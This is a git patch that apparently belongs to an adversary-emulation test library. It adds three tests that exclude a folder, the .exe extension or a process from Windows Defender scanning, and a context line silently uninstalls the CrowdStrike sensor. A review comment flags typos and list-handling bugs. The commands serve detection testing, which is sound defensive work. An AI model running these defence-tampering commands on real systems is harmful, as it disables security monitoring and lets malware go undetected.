From 67e3776d7c1b8fc78b23cbcbccaf8a71251f94ac Mon Sep 17 00:00:00 2001
From: san-gwea <57334373+san-gwea@users.noreply.github.com>
Date: Thu, 16 Jul 2020 20:09:55 -0500
Subject: [PATCH] T1562 exclude objects (#1131)
* added a test for evading detection by excluding path from scanning
* added tests for evading process and extesnion scanning
* fixed syntax
* description correction
Co-authored-by: Carrie Roberts
---
atomics/T1562.001/T1562.001.yaml | 64 +++++++++++++++++++++++++++++++-
1 file changed, 63 insertions(+), 1 deletion(-)
diff --git a/atomics/T1562.001/T1562.001.yaml b/atomics/T1562.001/T1562.001.yaml
index 5899294d..491fd054 100644
--- a/atomics/T1562.001/T1562.001.yaml
+++ b/atomics/T1562.001/T1562.001.yaml
@@ -367,4 +367,66 @@ atomic_tests:
 command: if (Test-Path "#{falcond_path}") {. "#{falcond_path}" /repair /uninstall /quiet } else { Get-ChildItem -Path "C:\ProgramData\Package Cache" -Include "WindowsSensor.exe" -Recurse | % { $sig=$(Get-AuthenticodeSignature -FilePath $_.FullName); if ($sig.Status -eq "Valid" -and $sig.SignerCertificate.DnsNameList -eq "CrowdStrike, Inc.") { . "$_" /repair /uninstall /quiet; break;}}}
 name: powershell
 elevation_required: true
-
+- name: Tamper with Windows Defender Evade Scanning -Folder
+ description: |
+ Malware can exclude a specific path from being scanned and evading detection.
+ Upon successul execution, the file provided should be on the list of excluded path.
+ To check the exclusion list using poweshell (Get-MpPreference).ExclusionPath
+ supported_platforms:
+ - windows
+ input_arguments:
+ excluded_folder:
+ description: This folder will be excluded from scanning
+ type: String
+ default: C:\Temp
+ executor:
+ command: |-
+ $excludedpath= "#{excluded_folder}"
+ Add-MpPreference -ExclusionPath $excludedpath
+ cleanup_command: |
+ $excludedpath= "#{excluded_folder}"
+ Remove-MpPreference -ExclusionPath $excludedpath
+ name: powershell
+ elevation_required: true
+- name: Tamper with Windows Defender Evade Scanning -Extension
+ description: |
+ Malware can exclude specific extensions from being scanned and evading detection.
+ Upon successful execution, the extension(s) should be on the list of excluded extensions.
+ To check the exclusion list using poweshell (Get-MpPreference).ExclusionExtension.
+ supported_platforms:
+ - windows
+ input_arguments:
+ excluded_exts:
+ description: A list of extension to exclude from scanning
+ type: string
+ default: .exe
+ executor:
+ command: |-
+ $excludedExts= "#{excluded_exts}"
+ Add-MpPreference -ExclusionExtension $excludedExts
+ cleanup_command: |
+ $excludedExts= "#{excluded_exts}"
+ Remove-MpPreference -ExclusionExtension $excludedExts
+ name: powershell
+ elevation_required: true
+- name: Tamper with Windows Defender Evade Scanning -Process
+ description: |
+ Malware can exclude specific processes from being scanned and evading detection.
+ Upon successful execution, the process(es) should be on the list of excluded processes.
+ To check the exclusion list using poweshell (Get-MpPreference).ExclusionProcess."
+ supported_platforms:
+ - windows
+ input_arguments:
+ excluded_process:
+ description: A list of processes to exclude from scanning
+ type: string
+ default: outlook.exe
+ executor:
+ command: |-
+ $excludedProcess = "#{excluded_process}"
+ Add-MpPreference -ExclusionProcess $excludedProcess
+ cleanup_command: |
+ $excludedProcess = "#{excluded_process}"
+ Remove-MpPreference -ExclusionProcess $excludedProcess
+ name: powershell
+ elevation_required: true
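Review bot: The `excluded_exts` and `excluded_process` arguments are documented as "A list of ..." but both executors bind the value as one quoted string (`$excludedExts= "#{excluded_exts}"`, `$excludedProcess = "#{excluded_process}"`), so a comma-separated value would reach `Add-MpPreference -ExclusionExtension` / `-ExclusionProcess` as a single element rather than several, and the matching `Remove-MpPreference` in cleanup_command would then target that same single entry. Either document that one value is expected or split it before the call in both the command and the cleanup, e.g. `$excludedExts = "#{excluded_exts}" -split ','`. The Folder test's `type: String` differs from the lower-case `type: string` used by the other two tests, and its description says "the file provided" although the argument is a folder. The Process description ends with a stray `"` after `.ExclusionProcess`, and "successul" and "poweshell" are misspelled in the descriptions.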